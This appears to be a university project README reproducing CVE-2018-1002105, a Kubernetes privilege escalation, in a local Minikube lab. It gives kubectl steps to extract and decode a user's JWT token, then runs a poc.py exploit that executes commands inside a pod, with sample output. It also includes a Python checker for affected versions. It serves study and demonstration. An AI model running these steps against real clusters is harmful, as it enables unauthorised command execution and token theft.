CMPT733-Group11(0x90)
CVE-2018-1002105
Members: Abhishek Rungta, Shubham Saini, Siddhant Sood
Environment Setup
- A Linux VM (such as Ubuntu 20.04)
- Minikube for local deployment of Kubernetes
- Any of these older Kubernetes versions (1.0.x–1.9.x, 1.10.0–1.10.10, 1.11.0–1.11.4, 1.12.0–1.12.2)
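To check whether a given cluster or component version falls inside the affected ranges listed above, the following is an added example (not part of this project's code). The function names and the sample version strings are constructed for illustration.

```python
import re

# Affected ranges as listed on this page, keyed by minor version of the 1.x line.
# Value = highest affected patch release; None = every patch release is affected.
AFFECTED = {minor: None for minor in range(0, 10)}   # 1.0.x - 1.9.x
AFFECTED.update({10: 10, 11: 4, 12: 2})              # 1.10.0-1.10.10, 1.11.0-1.11.4, 1.12.0-1.12.2

_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)")


def parse_version(text):
    """Return (major, minor, patch) from strings such as 'v1.12.2' or '1.11.4-gke.1'."""
    match = _VERSION_RE.match(text.strip())
    if not match:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(part) for part in match.groups())


def is_affected(text):
    """True if the version is inside one of the ranges listed on this page.

    Build suffixes (for example '-gke.1') are ignored, so a match on a
    vendor build means "check the vendor advisory", since a distribution
    may have backported the fix without changing the patch number.
    """
    major, minor, patch = parse_version(text)
    if major != 1 or minor not in AFFECTED:
        return False
    limit = AFFECTED[minor]
    return limit is None or patch <= limit


def audit(versions):
    """Map each component name to True if its reported version is affected."""
    return {name: is_affected(version) for name, version in versions.items()}


if __name__ == "__main__":
    # Constructed sample: version strings as reported by an API server and two nodes.
    sample = {
        "apiserver": "v1.12.2",
        "node-a": "v1.12.3",
        "node-b": "v1.11.4-gke.1",
    }
    for name, hit in audit(sample).items():
        print(f"{name}: {'AFFECTED' if hit else 'not in listed ranges'}")
```
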
Run the exploit
We have provided a VirtualBox image (.ova file). Download it and create a VM from it. The provided .ova is preconfigured with Docker v18.09 and Minikube v1.9.0.
Build the kubernetes cluster
As our virtual image already has Minikube and the required Kubernetes versions, just run the following command to start Minikube:
minikube start --kubernetes-version=v1.12.2
Create new user, namespace and assign role
Create a new user and a namespace, and assign an RBAC role to the new user, using the following command:
kubectl apply -f fixing_policy.yml
Remove access to conntrack
kubectl edit configmaps kube-proxy --namespace=kube-system
Set maxPerCore to 0.
Get the JWT token
First, run the following command to list the secrets holding the JWT tokens stored in the system:
kubectl get secrets -A
To get the secret of the particular user created, run the following command:
kubectl -n [namespace] get secrets [user-token] -o json
Then base64-decode the token value from the output:
export TOKEN=$(echo "[base64-encoded token]" | base64 -d)
echo "$TOKEN"
Get the IP address and port number
kubectl cluster-info
To deploy the pod
kubectl run --image=nginx:alpine securenginx -n poc
Run the POC
Specify all the required arguments:
- -t for the target ip:port (required)
- -j for the JWT token of the user (required)
- -p for the pod (required)
- -n for the namespace
- -m for the method (required)
- -c for the container
- -x for the attacker command
Test case
Input
./poc.py -t [IP:Port] -j [token] -p [pod] -n [namespace] -m attach -x "command"
./poc.py -t 127.0.0.1:32768 -j $TOKEN -p securenginx -m attach -n poc -x "ifconfig eth0"
Output
eth0 Link encap:Ethernet HWaddr 02:42:AC:11:00:02
inet addr:172.17.0.2 Bcast:172.17.255.255 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1313 errors:0 dropped:0 overruns:0 frame:0
TX packets:1224 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:217603 (212.5 KiB) TX bytes:428778 (418.7 KiB)
{"metadata":{},"status":"Success"}
Video Demo
Demo video link